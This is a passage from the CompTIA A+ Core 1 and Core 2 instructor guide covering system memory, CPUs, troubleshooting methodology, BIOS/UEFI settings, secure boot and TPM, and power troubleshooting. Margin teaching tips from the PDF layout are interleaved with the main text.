physical and virtual memory. A 32-bit CPU with a 32-bit address bus can access
a 4 GB address space. In theory, a 64-bit CPU could implement a 64-bit address
space (16 exabytes), but most 64-bit CPUs actually use a 48-bit address bus,
allowing up to 256 terabytes of memory.
A 64-bit CPU can address more memory locations than a 32-bit CPU. The 64-bit data
bus is the amount of memory that can be transferred between the CPU and RAM per cycle.
(Image ©123RF.com)
RAM Types
Show Modern system RAM is implemented as a type called Double Data Rate
Slide(s) Synchronous Dynamic Random Access Memory (DDR SDRAM). Unpacking that
RAM Types name reveals a history of PC system memory implementations from the 1990s
to today:
Teaching • Dynamic RAM stores each data bit as an electrical charge within a single bit cell.
Tip A bit cell consists of a capacitor to hold a charge (the cell represents 1 if there
Explain the features of is a charge and 0 if there is not) and a transistor to read the contents of the
DDR SDRAM. capacitor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 67
• Double Data Rate SDRAM (DDR SDRAM) makes two data transfers per
clock cycle.
DDR memory modules are labeled using the maximum theoretical bandwidth, such
as PC1600, PC2100, and so on. As an example of how this value is derived, consider
DDR-200 PC-1600 memory:
• The internal memory device clock speed and memory bus speed (between the
memory devices and memory controller) are both 100 MHz.
• The data rate is double this as there are two operations per clock “tick.” This is
expressed in units called megatransfers per second (200 MT/s). This gives the
DDR-200 designation.
• The peak transfer rate is 1600 MBps (200 MT/s multiplied by 8 bytes (64 bits)
per transfer). This gives the “PC-1600” designation. 1600 MBps is equivalent to
1.6 GBps.
The transfer rate is the speed at which data can be moved by the memory controller.
Memory modules also have internal timing characteristics, expressed as values, such
as 14-15-15-35 CAS 14. These timings can be used to differentiate performance of RAM
modules that are an identical DDR type and speed. Lower values are better.
Memory Modules
A memory module is a printed circuit board that holds a group of RAM devices that Show
act as a single unit. Memory modules are produced in different capacities. Each Slide(s)
DDR generation sets an upper limit on the maximum possible capacity. DDR for Memory Modules
desktop system memory is packaged in a form factor called dual inline memory
module (DIMM). The notches (keys) on the module’s edge connector identify the
DDR generation (DDR3/DDR4/DDR5) and prevent it from being inserted into an
incompatible slot or inserted the wrong way around. DDR DIMMs typically feature
heat sinks, due to the use of high clock speeds.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
68 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Memory slots look similar to expansion slots but with catches on each end to secure
the memory modules. Memory modules are vulnerable to electrostatic discharge (ESD).
Always take anti-ESD precautions when handling and storing these devices.
The DIMM’s DDR type must match the motherboard. You cannot install DDR5
modules in DDR4 slots, for instance. For best performance, the modules should be
rated at the same bus speed as the motherboard. It is possible to add modules that
are faster or slower than the motherboard slots or mix modules of different speeds.
However, the system will operate only at a speed that is supported by all installed
components (memory modules and controller), so this is not generally a good idea.
Laptop RAM is packaged in a smaller form factor called Small Outline DIMM
(SODIMM). The memory is typically fitted into slots that pop-up at a 45º angle to
allow the chips to be inserted or removed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 69
DDRx memory is sold in "kits" for dual-channel use, but there is nothing special about
the modules themselves other than being identical.
Motherboard DIMM slots (dual channel). Slots 1 and 3 (black slots) make up one channel, while
slots 2 and 4 (grey slots) make up a separate channel. (Image ©123RF.com)
When configuring a dual-channel system, you will need to consult the system
documentation to identify the appropriate slots to use. As a generic example, a
dual-channel motherboard might have four DIMM slots arranged in color-coded
pairs. Each pair represents one channel. For example, channel A might be color-
coded orange and channel B color-coded blue. Each slot in a pair represents one of
the two sockets in the channel (A1 and A2, for instance).
If only two 4 GB modules are available, to enable dual-channel, the modules must
be installed in socket 1 of each channel (A1 and B1, for instance). This pair of
modules should be identical in terms of clock speed and capacity. Ideally other
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
70 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
characteristics, such as timings and latency, should be identical too. If they are not,
the lowest (worst performing) values are used. Dual-channel mode may also need
to be enabled via the PC firmware’s system setup program.
DDR5 introduces a different type of data bus. Each memory module has two channels of
32 bits. When installed in a dual channel memory controller configuration, this becomes
four 32-bit channels. This architecture distributes the load on each RAM device better.
This supports better density (more gigabytes per module) and reduces latency. It also
works better with the multi-core features of modern CPUs.
ECC RAM
Show Error correcting code (ECC) RAM is used for workstations and servers that require
Slide(s) a high level of reliability. For each transfer, ECC RAM performs a hash calculation on
ECC RAM
the data value and stores it as an 8-bit checksum. This checksum requires an extra
processor chip on the module and a 72-bit data bus rather than the regular 64 bits.
Teaching The memory controller performs the same calculation and should derive the same
Tip checksum. This system can detect and correct single-bit errors and allow the PC
to continue functioning normally. ECC can also detect errors of 2, 3, or 4 bits but
ECC is more likely
to be found on cannot correct them. Instead, it will generate an error message and halt the system.
server systems than Most types of ECC are supplied as registered DIMMs (RDIMMs). A registered DIMM
on desktops, but
it might be used in
uses an extra component to reduce electrical load on the memory controller. This
workstations. has a slight performance penalty, but makes the system more reliable, especially
if large amounts of memory are installed. Most types of non-ECC memory are
unbuffered DIMMs (UDIMMs). Some types of ECC RAM are packaged in UDIMMs,
though this is rarer.
All these factors must be considered when selecting memory for a system:
• Both the motherboard and CPU must support ECC operation for it to be enabled.
• If a motherboard does support both, UDIMM and RDIMM modules cannot be mixed
on the same motherboard. The system will not boot if there are different types.
DDR5 implements a form of error checking that is internal to the module. This is not
the same as ECC implemented by the memory controller, where the error information is
communicated to the CPU. There are still non-ECC and ECC types of DDR5 RAM.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 71
Review Activity:
System Memory
8
No. The DDR generation of the motherboard slot and modules must match. You
can only use DDR3 modules.
Check the vendor’s setup/service manual. Many systems will use the slots
marked A1 and B1, but it’s best not to proceed without consulting the vendor’s
documentation.
4. Consulting the vendor documentation, you find that this system uses
DDR4 error-correcting code (ECC) RDIMMs. The spares you have are DDR4
ECC UDIMMs. Can they be used for the upgrade?
No. If the vendor documentation specifies registered memory (RDIMMs), you must
use RDIMM modules. Unbuffered DIMMs (UDIMMs) will not be compatible even if
they are ECC.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
72 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 2D
Install and Configure CPUs
5
Teaching
The central processing unit (CPU) is the principal system controller and has the
Tip
greatest overall impact on system performance. On most of today’s systems,
opportunities to improve the performance of a computer by upgrading the CPU
This topic concludes
the review of the
are limited. However, you must still understand the features of CPU architecture
main hardware and packaging to assist users with selecting appropriate systems, to perform
components. upgrades and replacements where necessary, and to help when troubleshooting
various issues.
CPU Architecture
Show The central processing unit (CPU), or simply the processor, executes program
Slide(s) instruction code. When a software program runs (whether it be system firmware, an
CPU Architecture operating system, anti-virus utility, or word-processing application), it is assembled
into instructions utilizing the fundamental instruction set of the CPU platform and
Teaching loaded into system memory. The CPU then performs the following basic operations
Tip on each instruction:
Re-cap the role of the 1. The control unit fetches the next instruction in sequence from system memory
CPU in processing low-
to the pipeline.
level instructions and
use of registers and
2. The control unit decodes each instruction in turn and either executes it itself
cache. Explain how
the instruction set and or passes it to the arithmetic logic unit (ALU) or floating-point unit (FPU) for
width (32-bit or 64-bit) execution.
determines software
compatibility with 3. The result of the executed instruction is written back to a register, to cache, or
hardware. Contrast to system memory.
ARM with x86/x64.
• A register is a temporary storage area available to the different units within
the CPU working at the same clock speed as the CPU.
• Cache is a small block of memory that works at the speed of the CPU or
close to it, depending on the cache level. Cache enhances performance by
storing instructions and data that the CPU is using regularly.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 73
A device driver is code that provides support for a specific model of hardware
component for a given operating system.
An x86/x64 platform is complex instruction set computing (CISC), meaning that it uses
a larger number (say around 1,000) of relatively more complex instructions. A single
complex instruction might generate multiple operations across the CPU’s registers
and take multiple clock cycles to complete. Reduced ISC (RISC) uses a small number
of simpler instructions (say 100). This means that tasks require the execution of more
instructions than with CISC, but each takes precisely one clock cycle. Because there are
fewer instructions overall, RISC can make better use of the CPU registers and cache.
For an operating system and hardware drivers to run on an ARM-based device, they
must be redesigned and compiled to use the ARM instruction set. While this task
is typically within the reach of operating system developers, converting existing
x86/x64 software applications to run on a different instruction set is an onerous
task. Another option is support for emulation. This means that the ARM device
runs a facsimile of an x86 or x64 environment. Windows 10 ARM-based devices
use emulation to run x86 and x64 software apps. Emulation typically imposes a
significant performance penalty, however.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
74 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
CPU Features
Show Given the architectural features just discussed, the speed at which the CPU runs
Slide(s) is generally seen as a key indicator of performance. This is certainly true when
CPU Features comparing CPUs with the same architecture but is not necessarily the case
otherwise.
Thermal and power performance impose limits to running the CPU faster and
faster. Another way to make execution more efficient is to improve the operation
of the instruction pipeline. The basic approach is to do the most amount of
work possible in a single clock cycle. This can be achieved through simultaneous
multithreading (SMT), referred to as HyperThreading by Intel. A thread is a stream
of instructions generated by a software application. Most applications run a single
process in a single thread; software that runs multiple parallel threads within a
process is said to be multithreaded. SMT allows the threads to run through the CPU
at the same time. This reduces the amount of “idle time” the CPU spends waiting for
new instructions to process. To the OS, it seems as though there are two or more
CPUs installed.
Another approach is to use two or more physical CPUs, referred to as symmetric
multiprocessing (SMP). An SMP-aware OS can then make efficient use of the
processing resources available to run application processes on whichever CPU
is “available.” This approach is not dependent on software applications being
multithreaded to deliver performance benefits. However, a multi-socket
motherboard is significantly more costly and so is implemented more often on
servers and high-end workstations than on desktops. The CPUs used in each socket
must be identical models and specifications and must be models that support SMP.
Improvements in CPU fabrication techniques led to the ability to expand compute
resources by fabricating multiple CPU cores on a single package. A single-core CPU
has a single execution unit and set of registers implemented on a single package.
A dual-core CPU is essentially two processors combined in the same package. This
means that there are two execution units and sets of registers. Each core will also
have its own cache plus access to a shared cache. This is referred to as chip level
multiprocessing (CMP).
The market has quickly moved beyond dual-core CPUs to multicore packages with
eight or more processors. Multicore and multithreading features are designated by
nC/nT notation. For example, an 8C/16T CPU with multithreading support has eight
cores but processes double that number of simultaneous threads.
Finally, a computer can be made more efficient and useful by configuring it to run
multiple operating systems at the same time. This is achieved through virtualization
software. Each OS is referred to as a virtual machine (VM). Intel’s Virtualization
Technology (VT) and AMD’s AMD-V provide processor extensions to support
virtualization, also referred to as hardware-assisted virtualization. This makes the
VMs run much more quickly. These extensions are usually features of premium
models in each processor range.
There is also a second generation of virtualization extensions to support Second
Level Address Translation (SLAT), a feature of virtualization software designed to
improve the management of virtual memory. These extensions are referred to as
Extended Page Table (EPT) by Intel and Rapid Virtualization Indexing (RVI) by AMD.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 75
GIGA-BYTE Z590 Gaming motherboard with Intel Socket 1200 LGA form factor CPU socket.
(Image used with permission from Gigabyte Technology.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
76 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
AMD uses pin grid array (PGA) form factor chips predominantly. The PGA form
factor positions the pins on the underside of the processor package. The CPU is
placed gently into the socket and then secured using a locking lever. Care must be
taken to orient pin 1 on the CPU correctly with pin 1 on the socket so as not to bend
or break any of the pins.
GIGA-BYTE X570S Gaming X motherboard with AMD Socket AM4 PGA form factor CPU socket.
(Image used with permission from Gigabyte Technology.)
When removing a CPU with a heat sink and fan assembly, use a gentle twist to
Show remove the heat sink to avoid it sticking to the CPU. Release the latch securing the
Slide(s) CPU before attempting to remove it. If reinstalling the same heat sink, clean old
CPU Types and thermal grease from the surfaces and apply a small amount of new grease in an
Motherboard X pattern. Do not apply too much—if it overruns, the excess could damage the socket.
Compatibility
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 77
Desktops
Desktop is shorthand for a basic PC as used at home or in the office. The term
desktop derives from a time when computer cases were designed to sit horizontally
on a desk, rather than the vertical tower or all-in-one configurations used today.
The desktop segment covers a wide range of performance levels, from budget
to gaming PC. These performance levels are reflected in the CPU manufacturer’s
ranges, with multiple models of Intel Core (i3/i5/i7/i9) and AMD Ryzen (A and 1
up to 9) CPUs at price points ranging from tens of dollars (i3 or Ryzen 1 series) to
thousands (Ryzen Threadripper Pro). Intel also uses its historic brands, such as
Pentium and Celeron, to market budget chips.
Current Intel desktop socket designs include LGA 2011, LGA 1151, LGA 2066, LGA
1200, and LGA 1700. Most current AMD CPUs use the PGA form factor socket AM4.
Workstations
The term workstation can be used in the same way as desktop to refer to any type
of business PC or network client. However, in the context of PC sales, most vendors
use the term workstation to mean a high-performance PC, such as one used for
software development or graphics/video editing. Workstation-class PCs often use
similar components to server-class computers.
Servers
Server-class computers must manage more demanding workloads than most types
of desktops and operate to greater reliability standards. Server motherboards are
often multi-socket, meaning that multiple CPU packages can be installed. Each
of these CPUs will have multiple cores and support for multithreading, giving the
server the raw processing power it needs to service requests from hundreds or
thousands of client systems.
Other features of server-class motherboards include support for tens of gigabytes
of ECC RAM and additional levels and amounts of cache memory. There are
dedicated CPU ranges for servers, such as Intel’s Xeon and AMD’s Epyc brands.
These ranges are also usually tied to specific supporting motherboards. A
motherboard for an Intel Xeon CPU is unlikely to be compatible with an Intel
Core CPU.
Intel’s recent Xeon models use LGA 1150, LGA 1151, and LGA 2011 sockets. AMD’s
Epyc CPU uses the LGA Socket SP3 form factor.
Mobiles
Smartphones, tablets, and laptops need to prioritize power and thermal efficiency
plus weight over pure performance. Many mobiles use ARM-based CPUs for this
reason, and both Intel and AMD have separate mobile CPU models within each
generation of their platforms. Mobile CPUs tend to use different socket form
factors to desktops. Many are soldered to the motherboard and not replaceable or
upgradeable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
78 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
CPUs
6
No. You must verify that the CPU model supports virtualization extensions.
4. What must you check when inserting a PGA form factor CPU?
You must check that pin 1 is aligned properly and that the pins on the package are
aligned with the holes in the socket. Otherwise, you risk damaging the pins when
the locking lever is secured.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 79
Lesson 2
Summary
5
You should be able to install power supplies, cooling systems, storage devices, Show
system memory, and CPUs. Slide(s)
Summary
Guidelines for Installing System Devices
Teaching
Follow these guidelines to support the installation and configuration of
Tip
motherboards, peripheral devices, and connectors:
Try to include some
• When provisioning PSUs, check the input voltage and wattage rating (output) time at the end
requirements. Consider provisioning modular connectors to reduce cable clutter. of each lesson to
check students'
• Ensure that the passive, fan-based, or liquid-based cooling system is sufficient to understanding and
keep the computer operating within an acceptable temperature range. Perform answer questions.
regular maintenance to ensure that the computer is dust-free and that heat
Interaction
transfer is optimized through the correct application of thermal paste.
Opportunity
• When upgrading memory, assess motherboard requirements, especially when If there are
using RDIMMs and ECC memory. Match motherboard and DDR module clock limited hands-on
speeds for best performance, and use matched modules installed according to opportunities and
the system documentation to enable multi-channel modes. you downloaded the
service manuals, look
• When provisioning a new computer or upgrading the processor, match CPU at the procedures
for installing and
features such as high clock speed, multiprocessor support, multithreading upgrading system
support, core count, and virtualization support to the computer role (basic components.
desktop, workstation, gaming PC, server, or mobile).
Get students to
use review and
Additional practice questions for the topics covered in this lesson are available on the comparison sites to
CompTIA Learning Center. understand model
and generation
naming conventions
and identify the top
performing CPUs for
different classes:
• Best office desktop
CPU up to $200
(balance cost and
performance plus
use of integrated
graphics rather
than a dedicated
adapter).
• Gaming CPU up
to $1,000.
• Workstation CPU
with PCIe 5 and
DDR5 support.
These may only be
starting to come
onto the market.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 3
Troubleshooting PC Hardware
1
LESSON INTRODUCTION
Troubleshooting is a core competency for the role of CompTIA A+ service Show
technician. Whether it is trying to identify a fault in a new build system or assisting a Slide(s)
user with a computer that has just stopped working, you will typically be required to Objectives
demonstrate your troubleshooting skills on each and every day of your job.
To become an effective troubleshooter, you need a wide range of knowledge, the Teaching
ability to pay attention to details, and the readiness to be open and flexible in your Tip
approach to diagnosing issues. It is also important to learn and apply best practices This lesson introduces
the CompTIA
and a structured methodology to give yourself the best chance of success when
troubleshooting
diagnosing complex troubleshooting scenarios. model and reviews
Along with best practices, you also need to build knowledge of and experience with the troubleshooting
objectives and
the common symptoms that affect PC system components and peripheral devices. content examples for
motherboards, RAM,
Lesson Objectives CPU, power, storage
drives, RAID arrays,
video, projector, and
In this lesson, you will:
display issues.
• Apply troubleshooting methodology.
• Configure BIOS/UEFI.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
82 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 3A
Apply Troubleshooting Methodology
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 83
a) Once the theory is confirmed, determine the next steps to resolve the
problem.
4. Establish a plan of action to resolve the problem and implement the solution:
• What changes have been made recently to the system? Were these changes
initiated by you or via another support request?
• The latest change to a system is very often the cause of the problem. If
something worked previously, then excepting mechanical failures, it is likely
that the problem has arisen because of some user-initiated change or some
environmental or infrastructure change. If something has never worked, a
different approach is required.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
84 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Perform Backups
Consider the importance of data stored on the local computer when you open a
support case. Check when a backup was last made. If a backup has not been made,
perform one before changing the system configuration, if possible.
Conduct Research
You cannot always rely on the user to describe the problem accurately or
comprehensively. You may need to use research techniques to identify or clarify
symptoms and possible causes. One of the most useful troubleshooting skills
is being able to perform research to find information quickly. Learn to use web
and database search tools so that you can locate information that is relevant and
useful. Identify different knowledge sources available to you. When you research a
problem, be aware of both internal documentation and information and external
support resources, such as vendor support or forums.
• Make a physical inspection—look and listen. You may be able to see or hear a
fault (scorched motherboard, “sick”-sounding disk drive, no fan noise, and so on).
• Check the system documentation, installation and event logs, and diagnostic
tools for useful information.
• Consult other technicians who might have worked on the system recently or
might be working now on some related issue. Consider that environmental or
infrastructure changes might have been instigated by a different group within
the company. Perhaps you are responsible for application support and the
network infrastructure group has made some changes without issuing proper
notice.
• Consult vendor documentation and use web search and forum resources to see
if the issue is well-known and has an existing fix.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 85
3. Decide whether the problem is in the disk unit or connectors and cabling
(Connectors).
• Suppliers and manufacturers via warranty and support contracts and helplines
or web contact portals.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
86 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Obtain authorization to use social media or public forums. Do not disclose proprietary,
confidential, or personal information when discussing an issue publicly.
Choosing whether to escalate a problem is complex because you must balance the
need to resolve a problem in a timely fashion against the possibility of incurring
additional costs or adding to the burdens/priorities that senior staff are already
coping with. You should be guided by policies and practices in the company you
work for. When you escalate a problem, make sure that what you have found out
or attempted so far is documented. Failing that, describe the problem clearly to
whoever is taking over or providing you with assistance.
If a part or system is under warranty, you can return the broken part for a replacement.
To do this, you normally need to obtain a returned materials authorization (RMA) ticket
from the vendor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 87
Remember that troubleshooting may involve more than fixing a particular problem; it is
about maintaining the resources that users need to do their work.
Before you can consider a problem closed, you should both be satisfied in your own
mind that you have resolved it and get the customer's acceptance that it has been
fixed. Restate what the problem was and how it was resolved, and then confirm
with the customer that the incident log can be closed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
88 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 89
Review Activity:
Troubleshooting Methodology
3
1. You are dealing with a support request and think that you have Show
identified the probable cause of the reported problem. What should be Slide(s)
your next troubleshooting step? Review
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
90 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 3B
Configure BIOS/UEFI
6
Show
For many years, the system firmware for a PC was a type called the Basic
Slide(s)
Input/Output System (BIOS). BIOS only supports 32-bit operation and limited
functionality. Newer motherboards may use a different kind of firmware called
BIOS and UEFI
Unified Extensible Firmware Interface (UEFI). UEFI provides support for
Teaching
64-bit CPU operation at boot, a full GUI and mouse operation at boot, networking
Tip
functionality at boot, and better boot security. A computer with UEFI may also
support booting in a legacy BIOS mode.
Explain the function
of system firmware System settings can be configured via the system firmware setup program. The
and contrast BIOS and system setup program is accessed via a keystroke during the power-on (boot)
UEFI. Discuss how to
process, typically when the PC vendor’s logo is displayed. The key combination used
access system setup.
will vary from system to system; typical examples are Esc, Del, F1, F2, F10, or F12.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 91
One issue with modern computers is that the boot process can be very quick. If this
is the case, you can Shift-click the Restart button from the Windows logon screen to
access UEFI boot options.
You navigate a legacy BIOS setup program using the keyboard arrow keys. Pressing
Esc generally returns to the previous screen. When closing setup, there will be an
option to exit and discard changes or exit and save changes. Sometimes this is done
with a key (Esc versus F10, for instance), but more often there is a prompt. There
will also be an option for reloading the default settings in case you want to discard
any customizations you have made.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
92 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
UEFI setup programs use a graphical interface and have mouse support, though
advanced menus may still require keyboard navigation.
A UEFI setup program. (Screenshot used with permission from ASUSTek Computer Inc.)
Teaching
Tip
Discuss the security
implications of
allowing unauthorized
operating systems to
boot the computer.
As PATA and SCSI are
on the Core 1 exam
objectives, you might
want to point out
that options for IDE/
ATA Mode and SCSI
will appear separately
from SATA (AHCI) if
they are supported as
boot devices. Older
SATA devices could
work in either IDE or
AHCI mode.
Boot parameters.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 93
• USB—Most modern systems can boot from a USB drive that has been formatted
as a boot device. This option is often used for OS installs and repair utility boot
disks that are too large to fit on optical media.
USB Permissions
As well as boot device configuration, there will be options for enabling/disabling and
configuring controllers and adapters provided on the motherboard. This provides
a way of enforcing USB permissions. On many systems, allowing the connection of
USB devices is a security risk. The setup program might allow individual ports to be
enabled or disabled.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
94 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using UEFI setup to configure permissions for USB and other external interfaces.
(Screenshot used with permission from ASUSTek Computer Inc.)
Fan Considerations
Most cooling fans can be controlled via system settings, typically under a menu
such as Cooling, Power, or Advanced. The menu will present options such as
balanced, cool (run fans harder), quiet (reduce fan speed and allow higher
temperatures), fanless, and custom. There will also be settings for minimum
temperature, which is the value at which fans will be started to cool the system.
Duty cycle settings are used to control the frequency of power pulses to keep the
fan running. A high percentage makes the fan run faster.
The setup program will also report the current temperature of the probes located
near each fan connector.
There are many third-party utilities that can access these settings and monitors from
within the OS.
Show
Slide(s)
Boot Passwords and Secure Boot
Boot Passwords and A boot password requires the user to authenticate before the operating system is
Secure Boot loaded. Different system software will provide different support for authentication
methods. There are usually at least two passwords, though some systems may
Teaching
allow for more:
Tip
Note that system/ • Supervisor/Administrator/Setup—Protect access to the system setup program.
supervisor passwords
are more commonly • User/System—Lock access to the whole computer. This is a very secure way of
configured than user protecting an entire PC as nothing can be done until the firmware has initialized
passwords. the system.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 95
You must tell everyone who uses the PC the password, which weakens the security
considerably. This option would be used only on workstations and servers that aren't
used for interactive logon, such as computers running monitoring or management
software.
Secure boot is a UEFI feature designed to prevent a computer from being hijacked
by malware. Under secure boot, the computer firmware is configured with
cryptographic keys that can identify trusted code. The system firmware checks
the operating system boot loader using the stored keys to ensure that it has
been digitally signed by the OS vendor. This prevents a boot loader that has been
modified by malware or an OS installed without authorization from being used. Show
Slide(s)
Keys from vendors such as Microsoft (Windows and Windows Server) and Linux distributions Trusted Platform
(Fedora, openSUSE, and Ubuntu) will be pre-loaded. Additional keys for other boot loaders Modules
can be installed (or the pre-loaded ones removed) via the system setup software. It is also
possible to disable secure boot. Teaching
Tip
Explain encryption
in terms of the end
Trusted Platform Modules goal and the role of
the key. Explain that
Encryption products make data secure by scrambling it in such a way that it can TPM is an embedded
cryptoprocessor. The
only subsequently be read if the user has the correct decryption key. This security
idea is that nothing
system is only strong as long as access to the key is protected. UEFI-based systems can tamper with the
provide built-in secure storage for cryptographic keys. TPM so that everything
“approved” by it can
Encryption encodes data using a key to give it the property of confidentiality. Many be trusted.
cryptographic processes also make use of hashing. A secure hash is a unique code that You might want
could only have been generated from the input. Hashes can be used to compare two copies to note that HSM
of data to verify that they are the same. Unlike encryption, the original data cannot be is interpreted as a
recovered from the hash code. secure USB thumb
drive here, but in
most environments
the term refers
Trusted Platform Module to a fullyfeatured
appliance to manage
Trusted platform module (TPM) is a specification for hardware-based keys on an enterprise-
storage of digital certificates, cryptographic keys, and hashed passwords. wide basis.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
96 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The TPM establishes a root of trust. Each TPM microprocessor is hard coded with
a unique, unchangeable key, referred to as the endorsement key. During the boot
process, the TPM compares hashes of key system state data (system firmware,
boot loader, and OS kernel) to ensure they have not been tampered with. The
TPM chip has a secure storage area that a disk encryption program such as
Windows BitLocker can write its keys to.
The TPM can be enabled or disabled and reset via the system setup program,
though it is also possible to manage it from the OS as well.
Configuring a TPM.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 97
Review Activity:
BIOS/UEFI
7
1. Name three keys commonly used to run a PC's BIOS/UEFI system setup Show
program. Slide(s)
Review
Esc, Del, F1, F2, F10, or F12.
Teaching
2. What widely supported boot method is missing from the following list?
Tip
HDD, Optical, USB.
Take some time at
Network/PXE (Pre-eXecution Environment)—obtaining boot information from a the end of each topic
specially configured server over the network. to answer questions.
You can use the
3. When you are configuring firmware-enforced security, what is the review questions
for discussion in
difference between a supervisor password and a user password?
class or set them for
students to complete
The user password allows the boot sequence to continue, while a supervisor
individually during or
password controls access to the firmware setup program. after class.
4. True or false? A TPM provides secure removable storage so that
encryption keys can be used with different computers.
False. A trusted platform module (TPM) provides secure storage for a single
computer as it is an embedded function of the CPU or motherboard chipset. The
term hardware security module (HSM) is sometimes used to describe a secure USB
thumb drive for storing encryption keys on portable media.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
98 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 3C
Troubleshoot Power and Disk Issues
5
3. Check that the PSU cabling is connected to the PC and the wall socket correctly
and that all switches are in the “on” position.
4. Try another power cable—There may be a problem with the plug or fuse.
Check that all the wires are connected to the correct terminals in the plug.
Check the fuse resistance with a multimeter or swap with a known good fuse.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 99
5. Try disconnecting extra devices, such as a plug-in graphics card. If this solves
the problem, either the PSU is underpowered and you need to fit one with a
higher wattage rating, or one of the devices is faulty.
6. If you can ensure a safe working environment, test the PSU using a multimeter
or power supply tester.
Technician working with a power supply tester. (Image by Konstantin Malkov @123RF.com)
You must take appropriate safety measures before testing a live power supply. PC power
supplies are NOT user serviceable. Never remove the cover of a power supply.
If you still cannot identify the fault, then the problem is likely to be a faulty
motherboard or power supply. If you suspect that a power supply is faulty, do not
leave it turned on for longer than necessary and do not leave it unattended. Keep
an eye out for external signs of a problem (for example, smoke or fire). Turn off
